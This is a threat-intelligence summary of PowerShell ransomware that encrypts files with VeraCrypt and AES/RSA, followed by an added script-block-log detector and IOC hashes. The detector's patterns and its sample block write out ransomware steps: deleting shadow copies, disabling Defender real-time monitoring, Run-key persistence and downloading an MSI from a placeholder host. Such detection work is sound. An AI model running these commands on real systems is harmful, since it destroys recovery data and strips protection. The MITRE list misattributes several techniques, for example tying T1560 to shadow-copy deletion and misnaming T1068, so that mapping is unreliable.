The New Face of PowerShell: Ransomware Powered by PowerShell-Based Attacks

This article discusses the emergence of PowerShell ransomware: PowerShell has shifted from a supporting role in attacks to being the language in which malicious code, including ransomware, is written. Recent samples demonstrate capabilities such as encrypting files with VeraCrypt and combining AES and RSA encryption. The trend indicates that more threat actors are using PowerShell to develop increasingly sophisticated malicious code. Affected: Ransomware, Cybersecurity Sector, Victims of ransomware attacks

Key points:

  • PowerShell is increasingly being used on its own to create ransomware, not merely as a supporting tool.
  • The PowerShell ransomware samples exhibit capabilities like stopping processes, deleting shadow copies, and adding registry persistence.
  • The PowerShell script downloads VeraCrypt from a remote address during execution and uses it to encrypt the victim's data.
  • Ransomware samples use a combination of RSA and AES encryption algorithms to encrypt data.
  • As source code leaks occur, more threat actors are likely to emerge, increasing the use of PowerShell in cybercrime.

MITRE Techniques:

  • T1486 – Data Encrypted for Impact: Uses PowerShell to execute VeraCrypt for encrypting files on the victim’s system.
  • T1499 – Endpoint Denial of Service: Stops interfering processes to carry out ransomware activities.
  • T1560 – Archive Collected Data: Deletes shadow copies to prevent data recovery.
  • T1068 – Exploitation of Elevation Control Mechanism: Disables Windows Defender to bypass detection.
  • T1203 – Exploitation for Client Execution: Downloads and installs VeraCrypt from a remote location via PowerShell.
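As an added example (not code from the summarized article or its author), the following PowerShell script turns the behaviours listed in the key points and MITRE techniques above into a small script-block-log detector: it scores a script block by how many distinct ransomware-style behaviours appear in it, and can read live Event ID 4104 records. The regex patterns, function names and sample script blocks are constructed for this example; the download URL in the sample is a placeholder rather than the indicator from the article.

```powershell
# Added example (not from the summarized article): flag the behaviours the key
# points and MITRE list describe as they appear in PowerShell script block
# logging (Event ID 4104). Patterns and samples are constructed for illustration.

# One regex per behaviour. -match is case-insensitive in PowerShell, and
# single-quoted strings keep the regex backslashes literal.
$Indicators = [ordered]@{
    ShadowCopyDeletion = 'vssadmin(\.exe)?\s+delete\s+shadows|wmic\s+shadowcopy\s+delete|Win32_ShadowCopy'
    DefenderTampering  = 'Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion'
    ProcessKilling     = 'Stop-Process\b[^\r\n]*-Force|taskkill(\.exe)?\b[^\r\n]*/f\b'
    RunKeyPersistence  = 'CurrentVersion\\Run\b'
    VeraCryptDownload  = '(Invoke-WebRequest|iwr|curl|Start-BitsTransfer|DownloadFile|msiexec)[^\r\n]*VeraCrypt'
}

function Get-RansomwareBehaviours {
    # Returns the names of every behaviour whose pattern matches the text.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptBlockText)
    $hits = [System.Collections.Generic.List[string]]::new()
    foreach ($name in $Indicators.Keys) {
        if ($ScriptBlockText -match $Indicators[$name]) { $hits.Add($name) }
    }
    return ,$hits.ToArray()   # leading comma keeps an empty or single result as an array
}

function Test-LikelyRansomware {
    # Any single behaviour is common in legitimate administration; two or more
    # distinct behaviours in one script block is the useful signal.
    param([string]$ScriptBlockText, [int]$Threshold = 2)
    return (Get-RansomwareBehaviours -ScriptBlockText $ScriptBlockText).Count -ge $Threshold
}

function Get-SuspiciousScriptBlockEvents {
    # Reads Event ID 4104 from the local Microsoft-Windows-PowerShell/Operational
    # log. Requires script block logging to be enabled and rights to read the log.
    # Property index 2 is ScriptBlockText and 3 is ScriptBlockId; long blocks are
    # split across several events, so the fragments are joined before scoring.
    param([int]$MaxEvents = 1000, [int]$Threshold = 2)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction Stop
    $events | Group-Object { $_.Properties[3].Value } | ForEach-Object {
        $text = ($_.Group | Sort-Object { [int]$_.Properties[0].Value } | ForEach-Object { $_.Properties[2].Value }) -join ''
        $hits = Get-RansomwareBehaviours -ScriptBlockText $text
        if ($hits.Count -ge $Threshold) {
            [pscustomobject]@{
                TimeCreated   = $_.Group[0].TimeCreated
                ScriptBlockId = $_.Name
                Behaviours    = $hits -join ', '
            }
        }
    }
}

# Constructed sample script blocks standing in for 4104 ScriptBlockText values.
# The URL is a placeholder, not the indicator from the article.
$MultiBehaviourText = @'
Stop-Process -Name "sqlservr" -Force -ErrorAction SilentlyContinue
vssadmin.exe delete shadows /all /quiet
Set-MpPreference -DisableRealtimeMonitoring $true
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name Updater -Value $PSCommandPath
Invoke-WebRequest -Uri 'https://example.invalid/VeraCrypt_Setup_x64.msi' -OutFile "$env:TEMP\vc.msi"
'@

$Samples = @(
    [pscustomobject]@{ Name = 'benign-admin';      Text = 'Get-Process | Sort-Object CPU -Descending | Select-Object -First 5' }
    [pscustomobject]@{ Name = 'single-behaviour';  Text = 'Stop-Process -Name notepad -Force' }
    [pscustomobject]@{ Name = 'multi-behaviour';   Text = $MultiBehaviourText }
)

# Expected: benign-admin -> (none), False; single-behaviour -> ProcessKilling, False;
# multi-behaviour -> all five behaviours, True.
$Samples | ForEach-Object {
    $hits = Get-RansomwareBehaviours -ScriptBlockText $_.Text
    [pscustomobject]@{
        Sample     = $_.Name
        Behaviours = $(if ($hits.Count) { $hits -join ', ' } else { '(none)' })
        Likely     = Test-LikelyRansomware -ScriptBlockText $_.Text
    }
} | Format-Table -AutoSize
```

Run as-is to score the constructed samples; `Get-SuspiciousScriptBlockEvents` queries live Event ID 4104 records and only returns results when script block logging is turned on. The threshold of two distinct behaviours in a single block is what keeps routine administration (a lone `Stop-Process -Force`, a Defender exclusion added by an installer) out of the results while a block that stops services, deletes shadow copies and tampers with Defender in one go is surfaced.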

Indicators of Compromise:

  • [MD5] 982433cb4f485fb6f3cd9fb32cce3bb2
  • [MD5] f3b663ef29fd2f8b41cdcf17b4a4300d
  • [MD5] 118bd1887d7a1f825826e3a00f06b98e
  • [MD5] 4e7fd80028d4d0b227d48da1843762ab
  • [URL] https://Launchpad[.]net/veracrypt/trunk/1.25.9/+download/VeraCrypt_Setup_x64_1.25.9[.]msi

Full Story: https://malwareanalysisspace.blogspot.com/2025/03/the-new-face-of-powershell-ransomware.html